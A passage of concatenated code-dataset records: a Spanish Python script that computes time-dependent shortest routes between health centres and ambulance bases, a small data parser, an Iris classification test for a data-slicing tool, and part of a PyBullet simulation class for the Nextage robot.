Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 21\"] = distancia_arco / v21\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 22\"] = distancia_arco / v22\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 23\"] = distancia_arco / v23\n\n#función que obtiene rutas a mínimo tiempo dentro de un grafo ya instanciado Grafo, considerando una lista de orígenes y una lista de destinos dados como argumentos, además del tiempo sobre el cual se quiere hacer el cálculo de rutas entre los 24 tiempos que hay en el día\ndef rutas_tiempo_minimo_dijkstra_bidireccional(Grafo,lista_origenes,lista_destinos, string_tiempo):\n A=time.time()\n diccionario_tiempos={}\n diccionario_rutas={}\n contador=1\n diccionario_rutas_tiempo_minimo_centros_a_bases = dict()\n for origen in lista_origenes:\n centro = origen\n diccionario_rutas_tiempo_minimo_centros_a_bases[centro] = []\n for origen in lista_origenes:\n for destino in lista_destinos:\n id_centro = origen\n id_base = destino\n a=time.time()\n tupla_origen_destino = (origen,destino)\n resultados_tiempo_minimo = nx.bidirectional_dijkstra(Grafo, origen, destino,weight=string_tiempo)\n print(f\"ALGORITMO DE DIJKSTRA BIDIRECCIONAL PARA TIEMPOS ({string_tiempo})\")\n print(\"Ruta número\", contador, \"para\", string_tiempo)\n tiempo_ruta_tiempo_minimo = resultados_tiempo_minimo[0]\n lista_ruta_tiempo_minimo = resultados_tiempo_minimo[1]\n diccionario_tiempos[tupla_origen_destino] = tiempo_ruta_tiempo_minimo\n diccionario_rutas[tupla_origen_destino] = lista_ruta_tiempo_minimo\n print(\"Tiempo mínimo desde el nodo\",origen,\"al nodo\", destino,\":\",tiempo_ruta_tiempo_minimo)\n print(\"Lista de nodos de la ruta de tiempo mínimo\", lista_ruta_tiempo_minimo)\n b=time.time()\n print(\"Tiempo que tomó la obtención de ruta a tiempo mínimo usando Dijkstra Bidireccional para este par origen-destino (\",origen,\"-\",destino,\"):\",b-a,\"segundos; equivalente a\",\n (b-a)/60,\"minutos\")\n print(\"\")\n contador+=1\n\n lista_de_3_elementos_sobre_ruta_centro_a_base 
= [tiempo_ruta_tiempo_minimo, lista_ruta_tiempo_minimo, id_base]\n diccionario_rutas_tiempo_minimo_centros_a_bases[id_centro].append(lista_de_3_elementos_sobre_ruta_centro_a_base)\n\n B=time.time()\n segundos=B-A\n minutos=segundos/60\n horas=minutos/60\n for origen in lista_origenes:\n id_centro = origen\n diccionario_rutas_tiempo_minimo_centros_a_bases[id_centro].sort()\n\n return diccionario_rutas_tiempo_minimo_centros_a_bases\n\n\nprint(\"\")\nprint(\"Número de nodos (intersecciones) del grafo\", len(Grafo.nodes))\nprint(\"Número de arcos (calles) del grafo\", len(Grafo.edges))\nprint(\"\")\n\n\ndiccionario_centros_salud = dict()\n#lectura archivo centros.csv\nwith open('centros.csv') as centros:\n lista_centros_destinos = []\n contador = 0\n ca = []\n caa = []\n for i in csv.reader(centros):\n if contador > 0:\n lista_informacion_centros = i[0].split(\";\")\n coordenada_x_centro = float(lista_informacion_centros[0])\n coordenada_y_centro = float(lista_informacion_centros[1])\n id_nodo_mas_cercano_a_centro = nodo_mas_cercano(coordenada_x_centro, coordenada_y_centro, Grafo)\n\n lista_centros_destinos.append(id_nodo_mas_cercano_a_centro)\n tupla_coordenadas = (coordenada_x_centro, coordenada_y_centro)\n bool_agregar_coordenada = False\n for id_centro in diccionario_centros_salud.keys():\n if id_centro == id_nodo_mas_cercano_a_centro:\n bool_agregar_coordenada = True\n if bool_agregar_coordenada == True:\n diccionario_centros_salud[id_nodo_mas_cercano_a_centro].append(tupla_coordenadas)\n else:\n diccionario_centros_salud[id_nodo_mas_cercano_a_centro] = [tupla_coordenadas]\n \n\n\n\n\n if (Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"] ) in ca:\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n #print(coordenada_x_centro, coordenada_y_centro)\n for i in caa:\n id_nodo_mas_cercano_a_centro2 = nodo_mas_cercano(i[0], i[1], Grafo)\n if id_nodo_mas_cercano_a_centro == id_nodo_mas_cercano_a_centro2:\n #print(i[0], i[1])\n #print(coordenada_x_centro, coordenada_y_centro)\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n pass\n else:\n ca.append((Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"],Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"] ))\n caa.append((coordenada_x_centro, coordenada_y_centro))\n #print()\n contador += 1\n\n#lectura archivo bases.csv\nwith open('bases.csv') as bases:\n lista_bases_origenes = []\n contador = 0\n ca = []\n caa = []\n for i in csv.reader(bases):\n if contador > 0:\n lista_informacion_bases = i[0].split(\";\")\n coordenada_x_base = float(lista_informacion_bases[0])\n coordenada_y_base = float(lista_informacion_bases[1])\n id_nodo_mas_cercano_a_base = nodo_mas_cercano(coordenada_x_base, coordenada_y_base, Grafo)\n lista_bases_origenes.append(id_nodo_mas_cercano_a_base)\n #print(id_nodo_mas_cercano_a_base)\n #print()\n if (Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada y\"] ) in ca:\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n #print(coordenada_x_centro, coordenada_y_centro)\n for i in caa:\n id_nodo_mas_cercano_a_base2 = nodo_mas_cercano(i[0], i[1], Grafo)\n if id_nodo_mas_cercano_a_base == id_nodo_mas_cercano_a_base2:\n #print(i[0], i[1])\n 
#print(coordenada_x_centro, coordenada_y_centro)\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n pass\n else:\n ca.append((Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada x\"],Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada y\"] ))\n caa.append((coordenada_x_base, coordenada_y_base))\n #print()\n contador += 1\n\nlista_reducida_eventos = lista_eventos[1:80]\ndiccionario_eventos = dict()\nlista_nodos_eventos = []\nfor evento in lista_reducida_eventos:\n evento = evento.split(\";\")\n coordenada_x = evento[0]\n coordenada_y = evento[1]\n id_nodo_mas_cercano = nodo_mas_cercano(coordenada_x, coordenada_y, Grafo)\n tupla_coordenadas = (coordenada_x, coordenada_y)\n lista_nodos_eventos.append(id_nodo_mas_cercano)\n bool_agregar_coordenada = False\n for id_evento in diccionario_eventos.keys():\n if id_evento == id_nodo_mas_cercano:\n bool_agregar_coordenada = True\n if bool_agregar_coordenada == True:\n diccionario_eventos[id_nodo_mas_cercano].append(tupla_coordenadas)\n else:\n diccionario_eventos[id_nodo_mas_cercano] = [tupla_coordenadas]\n\n\nset_nodos = set(lista_nodos_eventos)\nprint(f\"Largo de lista con id de nodos asociados a eventos: {len(lista_nodos_eventos)}\")\nprint(f\"Largo de set con id de nodos asociados a eventos: {len(set(lista_nodos_eventos))}\")\nprint(\"Los 79 eventos del primer día, se asocian a 78 nodos diferentes, por lo tanto existen 2 eventos que se asocian a un mismo nodo de la ciudad\")\nfor j, i in diccionario_eventos.items():\n cantidad_eventos_asociados_a_nodo = len(i)\n if cantidad_eventos_asociados_a_nodo > 1:\n print(f\"El nodo con id {j} tiene asociado más de un evento. En particular, tiene asociado {cantidad_eventos_asociados_a_nodo} eventos. A continuación se muestran las coordenadas de los eventos asociados: {i}\") \nprint()\nprint(f\"Largo de lista con id de nodos asociados a centros de salud: {len(lista_centros_destinos)}\")\nprint(f\"Largo de set con id de nodos asociados a centros de salud: {len(set(lista_centros_destinos))}\")\nprint(\"Existen 2 centros de salud asociados a un mismo nodo. Esto significará eliminar uno de la modelación.\")\nfor j, i in diccionario_centros_salud.items():\n cantidad_centros_asociados_a_nodo = len(i)\n if cantidad_centros_asociados_a_nodo > 1:\n print(f\"El nodo con id {j} tiene asociado más de un centro de salud. En particular, tiene asociado {cantidad_centros_asociados_a_nodo} centros de salud. A continuación se muestran las coordenadas de los centros de salud asociados: {i}\") \nprint()\nprint(f\"Largo de lista con id de nodos asociados a centros de salud y con id de nodos asociados a eventos (len(lista_nodos_eventos+lista_centros_destinos)): {len(lista_nodos_eventos+lista_centros_destinos)}\")\nprint(f\"Largo de set con id de nodos asociados a centros de salud y con id de nodos asociados a eventos (len((set(lista_nodos_eventos+lista_centros_destinos)))): {len(set(lista_nodos_eventos+lista_centros_destinos))}\")\nprint(\"Existen en 2 ocasiones que un mismo nodo está asociado tanto a un evento como a un centro de salud.\")\nfor nodo_evento in list(set(lista_nodos_eventos)):\n for centro_salud in lista_centros_destinos:\n if nodo_evento == centro_salud:\n print(f'-El nodo con id {nodo_evento} y coordenadas ({Grafo.nodes[nodo_evento][\"Coordenada x\"]};{Grafo.nodes[nodo_evento][\"Coordenada y\"]}), tiene asociado tanto un evento como un centro de salud. 
El evento asociado ocurrió en las coordenadas: {diccionario_eventos[nodo_evento]}. El centro de salud tiene las siguientes coordenadas: {diccionario_centros_salud[nodo_evento]}')\nprint()\nprint(f\"Largo de lista con id de nodos asociados a bases: {len(lista_bases_origenes)}\")\nprint(f\"Largo de set con id de nodos asociados a bases: {len(set(lista_bases_origenes))}\")\nprint(\"No existen bases que se asocien a un mismo nodo del grafo.\")\n\nlista_bases = lista_bases_origenes\n#Código para sacar rutas a tiempo mínimo usando dijkstra bidireccional con origen los nodos asociados a los eventos del primer día de eventos.csv y destino los centros de salud\nA = time.time()\ncontador = 0\ndiccionario_24_tiempos = dict()\nfor i in range(24): \n lista_centros_origenes = list(set(lista_centros_destinos))\n lista_bases_destinos = list(set(lista_bases))\n fstring = f\"Tiempo {i}\"\n diccionario_dijkstra_bidireccional_tiempo_centros_de_salud_a_bases = rutas_tiempo_minimo_dijkstra_bidireccional(Grafo, lista_centros_origenes, lista_bases_destinos, fstring)\n diccionario_24_tiempos[fstring] = diccionario_dijkstra_bidireccional_tiempo_centros_de_salud_a_bases\n cantidad_de_rutas_por_tiempo = len(lista_centros_origenes)*len(lista_bases_destinos)\n contador += cantidad_de_rutas_por_tiempo\nB = time.time()\n\nprint(f\"El tiempo que tomó calcular las {contador} = {len(lista_centros_origenes)}*{len(lista_bases_destinos)}*24 rutas a tiempo mínimo fue de {B-A} segundos, equivalente a {(B-A)/60} minutos, equivalente a {(B-A)/3600} horas\")\nprint(f\"El tiempo promedio que tomó calcular cada ruta fue de {(B-A)/contador} segundos, equivalente a {(B-A)/(60*contador)} minutos, equivalente a {(B-A)/(3600*contador)} horas\")\n\n\n\n\n\n\n# {id_nodo_asociado_a_evento : lista_rutas_de_un_evento}\n# {1: [(20, [5,7,3,4,1], 5), ]}\n\n\n\n#a = [(2, \"hola\"), (1, \"chao\")]\n#a.sort()\n#print(a)\n\n\n\ndiccionario_24_tiempos_rutas_centros_a_bases = diccionario_24_tiempos\n#diccionario_24_tiempos_rutas_centros_a_bases = {\"Tiempo 0\": {id_centro1: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....], ..., id_centro_66: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....]}, ..., \"Tiempo 24\": {id_centro1: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....], ..., id_centro_66: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....]}}\n#A LA SIMULACIÓN HAY QUE PASARLE EL DICCIONARIO diccionario_24_tiempos_rutas_centros_a_bases\nwith open(\"diccionario_24_tiempos_rutas_centros_a_bases.json\", \"w\") as f:\n json.dump(diccionario_24_tiempos_rutas_centros_a_bases, f)","sub_path":"dijkstra_reducido_centros_a_bases.py","file_name":"dijkstra_reducido_centros_a_bases.py","file_ext":"py","file_size_in_byte":18597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"613159556","text":"import csv\n\nfile = 'app/test_data.txt'\n#file = 'app/static/ulta/product_data.txt'\n\n\ncount = 0\nwith open(file) as f:\n line = f.readline()\n for lines in f:\n \tcount+=1\ncolumn_length = len(line.split())\ncl = column_length\nrow_length = count\nrl = row_length\n\ndata_parse = list(csv.reader(open(file, 'rb'), delimiter='\\t'))\ndp = data_parse\nd =dict()\t\n\nfields = dp[0]\n\ndef tick():\n\tdp = data_parse\n\trl = row_length\n\ticount = 1\n\tlst =[]\n\twhile rl > 0:\n\t line = dp[icount][count]\n\t lst.append(\"\".join([ch for ch in line if ord(ch)<= 128])) #lst.append(line)\n\t rl = rl - 1\n\t icount+=1\n\td[field] = lst\n\ncount = 0\nfor field 
in fields:\n\ttick()\n\tcl = cl -1\n\tcount+=1\n\n\n","sub_path":"dev_app/app/dataparse.py","file_name":"dataparse.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"464991294","text":"import pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport slicing.slicer as slicer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\n\n\ndataset = pd.read_csv('iris.csv')\nattributes_amount = len(dataset.values[0])\nx = dataset.iloc[:, 0:attributes_amount - 1].values\nenc = OneHotEncoder(handle_unknown='ignore')\nx = enc.fit_transform(x).toarray()\ny = dataset.iloc[:, attributes_amount - 1]\nle = preprocessing.LabelEncoder()\nle.fit(y)\ny = le.transform(y)\ncomplete_x = []\ncomplete_y = []\ncounter = 0\nall_indexes = []\nall_features = enc.get_feature_names()\nx_size = len(complete_x)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\nfor item in x_test:\n complete_x.append((counter, item))\n complete_y.append((counter, y_test[counter]))\n counter = counter + 1\nx_size = counter\nclf = RandomForestClassifier(n_jobs=2, random_state=0)\nclf.fit(x_train, y_train)\nRandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=None, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=10, n_jobs=2, oob_score=False, random_state=0,\n verbose=0, warm_start=False)\n\n# alpha is size significance coefficient\n# verbose option is for returning debug info while creating slices and printing it\n# k is number of top-slices we want\n# w is a weight of error function significance (1 - w) is a size significance propagated into optimization function\n# loss_type = 0 (l2 in case of regression model\n# loss_type = 1 (cross entropy in case of classification model)\npreds = clf.predict(x_test)\npredictions = []\ncounter = 0\nmistakes = 0\nfor pred in preds:\n predictions.append((counter, pred))\n if y_test[counter] != pred:\n mistakes = mistakes + 1\n counter = counter + 1\nlossF = mistakes / counter\nslicer.process(all_features, clf, complete_x, lossF, x_size, complete_y, predictions, debug=True, alpha=6, k=10,\n w=0.5, loss_type=1)\n","sub_path":"scripts/staging/slicing/base/tests/classification/test_iris.py","file_name":"test_iris.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"493959367","text":"from scipy.spatial.transform import Rotation as npRotation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport re\nimport time\nimport yaml\n\n\nclass Simulation_base:\n \"\"\"A Bullet simulation involving Nextage robot\"\"\"\n\n ########## Class initialiser ##########\n def __init__(self, pybulletConfigs, robotConfigs):\n \"\"\"Creates a simulation instance with Nextage robot\n Keyword Arguments:\n pybulletConfigs (dict) = {\n \"simulation\" : bullet_simulation -- pybullet package\n \"pybullet_extra_data\" : pybullet_data -- pybullet_data package\n \"gui\" : True -- enables the gui visualizer, if False it will runs headless\n \"panels\" : False -- show/hide the user interaction pyBullet panels\n \"realTime\" : False -- use realtime simulation\n \"controlFrequency\" : 1000 -- pybullet control updating frequency (in hertz)\n 
\"updateFrequency\" : 250 -- pybullet debug view updating frequency (in hertz)\n \"gravity\" : -9.81 -- gravity constant\n \"gravityCompensation\" : 0.9 -- a naive way to compensate gravity\n \"floor\" : True -- show floor or not\n \"cameraSettings\" : None -- initial camera settings\n }\n robotConfigs (dict) = {\n \"robotPath\" : str -- path_to_robot_urdf_file\n \"robotPIDConfigs\" : str -- path_to_robot_PID_configs_file\n \"robotStartPos\" : [0, 0, 0.85] -- starting position of the robot \n \"robotStartOrientation\" : [0,0,0,1] -- starting orientation of the robot\n \"fixedBase\" : False -- makes the base of the robot floating/fixed\n \"colored\" : False -- makes the robot coloured\n }\n \"\"\"\n\n self.pybulletConfigs = pybulletConfigs\n self.robotConfigs = robotConfigs\n self.p = self.pybulletConfigs[\"simulation\"]\n self.gui = pybulletConfigs[\"gui\"]\n self.pybullet_data = self.pybulletConfigs[\"pybullet_extra_data\"]\n self.controlFrequency = pybulletConfigs[\"controlFrequency\"]\n self.updateFrequency = pybulletConfigs[\"updateFrequency\"]\n self.dt = 1. / self.controlFrequency\n\n self.cameraPresets = {\n \"cameraPreset1\": (1.8, 122.0, -27.6, (-0.03, 0.03, 0.83)),\n \"cameraPreset2\": (1.2, 172.0, 4.0, (0.26, -0.21, 1.14)),\n \"cameraPreset3\": (1.4, 49.2, -6.4, (0.23, 0.48, 0.88)),\n \"cameraPreset4\": (1.2, 126.4, -12.8, (-0.12, -0.01, 0.99)),\n \"cameraPreset5\": (1.2, 90, -22.8, (-0.12, -0.01, 0.99))\n }\n\n ### Simulation setup\n # Instanciating bullet\n if self.gui:\n self.physicsClient = self.p.connect(self.p.GUI)\n else:\n self.physicsClient = self.p.connect(self.p.DIRECT)\n\n # GUI / visual configs\n if not self.pybulletConfigs[\"panels\"]:\n self.p.configureDebugVisualizer(self.p.COV_ENABLE_GUI, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_SEGMENTATION_MARK_PREVIEW, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_DEPTH_BUFFER_PREVIEW, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_RGB_BUFFER_PREVIEW, 0)\n self.p.configureDebugVisualizer(self.p.COV_ENABLE_MOUSE_PICKING, 1)\n if \"cameraPreset\" in self.pybulletConfigs[\"cameraSettings\"]:\n # try to resolve camera config as a string\n try:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[self.pybulletConfigs[\"cameraSettings\"]])\n except:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[\"cameraPreset1\"])\n else:\n # try to resolve camera config as a camera config\n try:\n self.p.resetDebugVisualizerCamera(\n *self.pybulletConfigs[\"cameraSettings\"])\n except:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[\"cameraPreset1\"])\n\n # Engine parameters\n self.p.setRealTimeSimulation(pybulletConfigs[\"realTime\"])\n self.p.setGravity(0, 0, pybulletConfigs[\"gravity\"])\n self.p.setPhysicsEngineParameter(fixedTimeStep=self.dt)\n\n # Gravity compensation ratio\n self.gravityCompensationRatio = pybulletConfigs[\"gravityCompensation\"]\n\n ### Loading objects/robots\n # add directories\n self.p.setAdditionalSearchPath(self.pybullet_data.getDataPath())\n\n # Loading floor and/or plane ground\n if pybulletConfigs[\"floor\"]:\n self.floor = self.p.loadURDF(\"plane.urdf\")\n else:\n self.floor = None\n\n # Loading robot\n self.mass = None\n robotFixedBase = 1 if robotConfigs[\"fixedBase\"] else 0\n self.robot = self.p.loadURDF(\n fileName=robotConfigs[\"robotPath\"],\n basePosition=robotConfigs[\"robotStartPos\"],\n baseOrientation=robotConfigs[\"robotStartOrientation\"],\n useFixedBase=robotFixedBase,\n # flags = (self.p.URDF_USE_SELF_COLLISION\n # + 
self.p.URDF_USE_INERTIA_FROM_FILE),\n )\n\n # loading robot PID configs\n self.ctrlConfig = yaml.load(\n open(self.robotConfigs[\"robotPIDConfigs\"]), Loader=yaml.FullLoader)\n\n # Setting frictions parameters to default ones\n self.setFloorFrictions()\n\n # Initialize joints and frames\n self.frames = {}\n self.noJoints = 0\n self.joints = []\n self.jointIds = {}\n self.jointsInfos = {}\n self.jointControllers = {}\n self.jointControlType = {}\n self.jointTorques = {}\n self.jointMaxTorques = {}\n self.jointTargetPos = {}\n self.jointPositionOld = {}\n self.jointTargetVels = {}\n self.jointIntegrals = {}\n self.jointGravCompensation = {}\n\n self.robotLimbs = [\n [\"LARM_JOINT0\", \"LARM_JOINT1\", \"LARM_JOINT2\",\n \"LARM_JOINT3\", \"LARM_JOINT4\", \"LARM_JOINT5\"],\n [\"RARM_JOINT0\", \"RARM_JOINT1\", \"RARM_JOINT2\",\n \"RARM_JOINT3\", \"RARM_JOINT4\", \"RARM_JOINT5\"],\n [\"HEAD_JOINT0\", \"HEAD_JOINT1\"]\n ]\n\n self.colorPalettes = {\n \"lightOrange\": [1.0, 0.82, 0.12, 1.0],\n \"darkOrange\": [1.0, 0.6, 0.0, 1.0],\n \"darkGrey\": [0.43, 0.43, 0.43, 1.0],\n \"lightGrey\": [0.65, 0.65, 0.65, 1.0],\n }\n\n # Initiallizing joint infos\n n = 0\n for k in range(self.p.getNumJoints(self.robot)):\n jointInfo = self.p.getJointInfo(self.robot, k)\n jointName = jointInfo[1].decode('utf-8')\n\n if not jointName.endswith('_fixing') and not jointName.endswith('_passive'):\n if '_frame' in jointName:\n self.frames[jointName] = k\n else:\n self.joints.append(jointName)\n self.jointIds[jointName] = n\n n += 1\n\n self.jointsInfos[jointName] = {\n 'type': jointInfo[2]\n }\n if jointInfo[8] < jointInfo[9]:\n self.jointsInfos[jointName]['lowerLimit'] = jointInfo[8]\n self.jointsInfos[jointName]['upperLimit'] = jointInfo[9]\n else:\n # default value\n self.jointsInfos[jointName]['lowerLimit'] = -2.0\n # default value\n self.jointsInfos[jointName]['upperLimit'] = 2.0\n self.jointsInfos[jointName]['restPos'] = self.getJointPos(\n jointName)\n # default value\n self.jointsInfos[jointName]['jointRange'] = 2.0\n\n if re.match('(base|BASE)', jointName):\n self.jointControllers[jointName] = \"SKIP_THIS_JOINT\"\n else:\n self.jointControllers[jointName] = jointName + \\\n \"_position_controller\"\n self.jointControlType[jointName] = \"velocity\"\n self.jointTorques[jointName] = 0.0\n self.jointTargetPos[jointName] = 0.0\n self.jointPositionOld[jointName] = 0.0\n self.jointTargetVels[jointName] = 0.0\n self.jointIntegrals[jointName] = 0.0\n self.jointGravCompensation[jointName] = 0.0\n\n self.noJoints = len(self.jointIds)\n\n # Initializing debug lines\n self.initialiseDebugLines()\n # Robot color scheme, modify as you wish\n self.robotColorPreset = {\n 'base_to_waist': \"darkGrey\",\n 'CHEST_JOINT0': \"lightGrey\",\n 'HEAD_JOINT0': \"darkOrange\",\n 'HEAD_JOINT1': \"lightOrange\",\n 'LARM_JOINT0': \"darkOrange\",\n 'LARM_JOINT1': \"lightOrange\",\n 'LARM_JOINT2': \"darkOrange\",\n 'LARM_JOINT3': \"lightOrange\",\n 'LARM_JOINT4': \"darkOrange\",\n 'LARM_JOINT5': \"lightOrange\",\n 'RARM_JOINT0': \"darkOrange\",\n 'RARM_JOINT1': \"lightOrange\",\n 'RARM_JOINT2': \"darkOrange\",\n 'RARM_JOINT3': \"lightOrange\",\n 'RARM_JOINT4': \"darkOrange\",\n 'RARM_JOINT5': \"lightOrange\"\n }\n # Apply colors if required\n if robotConfigs['colored']:\n for joint in self.robotColorPreset:\n self.p.resetVisualShapeData(\n self.robot, self.jointIds[joint], \n rgbaColor=self.colorPalettes[self.robotColorPreset[joint]])\n\n # Finishing up and show no of joints\n print('[Simulation] Found '+str(len(self.jointIds))+' DOFs')\n\n 
########## Destructor ##########\n    def __del__(self):\n        self.p.disconnect()\n        time.sleep(1)\n        print(f'[Simulation] Leaving')\n\n    ########## Setting up tools ##########\n    def setFloorFrictions(self, lateral=1, spinning=-1, rolling=-1):\n        \"\"\"Sets the frictions with the plane object\n\n        Keyword Arguments:\n            lateral (float) -- lateral friction (default: {1.0})\n            spinning (float) -- spinning friction (default: {-1.0})\n            rolling (float) -- rolling friction (default: {-1.0})\n        \"\"\"\n        if self.floor is not None:\n            self.p.changeDynamics(self.floor, -1, lateralFriction=lateral,\n                                  spinningFriction=spinning, rollingFriction=rolling)\n\n    def resetJointIntegrals(self):\n        \"\"\"Reset the integral value of every joint\"\"\"\n        for joint in self.joints:\n            self.jointIntegrals[joint] = 0.0\n\n    def debugCameralookAt(self, target):\n        \"\"\"Make the debug camera look at a point\n\n        Arguments:\n            target (tuple) -- target as (x,y,z) tuple\n        \"\"\"\n        if self.gui:\n            params = self.p.getDebugVisualizerCamera()\n            self.p.resetDebugVisualizerCamera(\n                params[10], params[8], params[9], target)\n\n    def changeLinkColor(self, jointName, color):\n        \"\"\"Change a link's color and opacity\n\n        Arguments:\n            jointName (str) -- the joint name\n            color [4 float] -- (r,g,b,a) for RGB and opacity from 0 to 1\n        \"\"\"\n        self.p.changeVisualShape(\n            self.robot, self.jointIds[jointName], rgbaColor=color)\n\n    def resetAllLinkColor(self, color=[1, 1, 1, 1]):\n        \"\"\"Reset all link's color\n\n        Keyword Arguments:\n            color [4 floats] -- [1,1,1,1] white color by default\n        \"\"\"\n        for i in range(self.noJoints):\n            self.p.changeVisualShape(self.robot, i, rgbaColor=color)\n\n    def initialiseDebugLines(self):\n        \"\"\"Initialise debug lines\"\"\"\n        self.lines = []\n        self.currentLine = 0\n        self.lastLinesDraw = 0\n        self.lineColors = [[1, 0, 0], [0, 1, 0], [\n            0, 0, 1], [1, 1, 0], [1, 0, 1], [0, 1, 1]]\n\n    def initGravCompensation(self):\n        \"\"\"Initialise the gravity compensation\"\"\"\n        for link in self.joints:\n            self.jointGravCompensation[link] = 0.0\n\n    def addDebugPosition(self, position, color=None, duration=30):\n        \"\"\"Adds a debug position to be drawn as a line\n\n        Arguments:\n            position (tuple) -- (x,y,z)\n\n        Keyword Arguments:\n            color (tuple) -- (r,g,b) (0->1) (default: {None})\n            duration (float) -- line duration on screen before disappearing (default: {30})\n        \"\"\"\n        if color is None:\n            color = self.lineColors[self.currentLine]\n\n        if self.currentLine >= len(self.lines):\n            self.lines.append({})\n\n        self.lines[self.currentLine]['update'] = True\n        self.lines[self.currentLine]['to'] = position\n        self.lines[self.currentLine]['color'] = color\n        self.lines[self.currentLine]['duration'] = duration\n\n        self.currentLine = (self.currentLine + 1) % len(self.lineColors)\n\n    def drawDebugLines(self):\n        \"\"\"Draw debug lines\"\"\"\n        self.currentLine = 0\n        if time.time() - self.lastLinesDraw > 0.05:\n            for line in self.lines:\n                if 'from' in line:\n                    if line['update'] == True:\n                        self.p.addUserDebugLine(\n                            line['from'], line['to'], line['color'], 2, line['duration'])\n                        line['update'] = False\n                    else:\n                        del line['from']\n                line['from'] = line['to']\n\n            self.lastLinesDraw = time.time()\n\n    def setBallPos(self, ball, position):\n        \"\"\"Sets the ball position on the field\n\n        Arguments:\n            ball (int) -- unique id of the ball\n            position (tuple of 3 floats) -- position of the ball\n        \"\"\"\n        if ball is not None:\n            # Putting the ball on the ground at given position\n            x, y, z = position\n            self.p.resetBasePositionAndOrientation(\n                ball, [x, y, z], 
self.p.getQuaternionFromEuler([0, 0, 0]))\n # Hover the ball if not using fixed base under gravity\n self.p.changeDynamics(ball, 0, linearDamping=0, angularDamping=0.1)\n\n def getCameraStatus(self):\n \"\"\"Returns: tuple -- camera status\"\"\"\n return self.p.getDebugVisualizerCamera()\n\n def getCamPosProcessed(self):\n \"\"\"Returns: tuple -- (camera position, camera focus position)\"\"\"\n # distance, yaw, pitch, tarPos, clientid(optional if you have multiple clients)\n config = self.getCameraStatus()\n config = config[10], config[8], config[9], config[11]\n camPos = list(map(lambda x: float(f'{x:.2f}'), config[:3]))\n camTar = list(map(lambda x: float(f'{x:.2f}'), config[3]))\n return (*camPos, tuple(camTar))\n\n def closeClient(self):\n \"\"\"Disconnect the Pybullet Simulator\"\"\"\n self.p.disconnect()\n\n ########## Robot Configs & Status ##########\n \n def getRobotPose(self, robot=None):\n \"\"\"Gets the robot (origin) position\n\n Returns:\n (tuple(3), tuple(3)) -- (x,y,z), (roll, pitch, yaw)\n \"\"\"\n if robot is None:\n robot = self.robot\n pose = self.p.getBasePositionAndOrientation(robot)\n return (pose[0], self.p.getEulerFromQuaternion(pose[1]))\n\n def setRobotPose(self, pos, orn, robot=None):\n \"\"\"Sets the robot (origin) pose\n\n Arguments:\n pos {tuple} -- (x,y,z) position\n orn {tuple} -- (x,y,z,w) quaternions\n \"\"\"\n if robot is None:\n robot = self.robot\n self.p.resetBasePositionAndOrientation(robot, pos, orn)\n\n def autoCollisions(self):\n \"\"\"Returns the total amount of N in autocollisions (not with ground)\n\n Returns:\n float -- Newtons of collisions not with ground\n \"\"\"\n total = 0\n for k in range(1, self.noJoints):\n contacts = self.p.getContactPoints(bodyA=k)\n for contact in contacts:\n if contact[2] != self.floor:\n total += contact[9]\n return total\n\n def disableRobotCollisions(self):\n \"\"\"Disable self collision of the robot\"\"\"\n for i in range(-1, self.noJoints):\n for j in range(-1, self.noJoints):\n self.p.setCollisionFilterPair(self.robot, self.robot, i, j, 0)\n\n def disableRobotBallCollision(self, ball):\n \"\"\"Disable collision between the robot and a ball\n \n Keyword Arguments:\n ball (int) -- the unique id of the ball\n \"\"\"\n for i in range(-1, self.noJoints):\n self.p.setCollisionFilterPair(self.robot, ball, i, -1, 0)\n\n def contactPoints(self):\n \"\"\"Gets all contact points and forces\n \n Returns:\n list -- list of entries (link_name, position in m, force in N)\n \"\"\"\n result = []\n 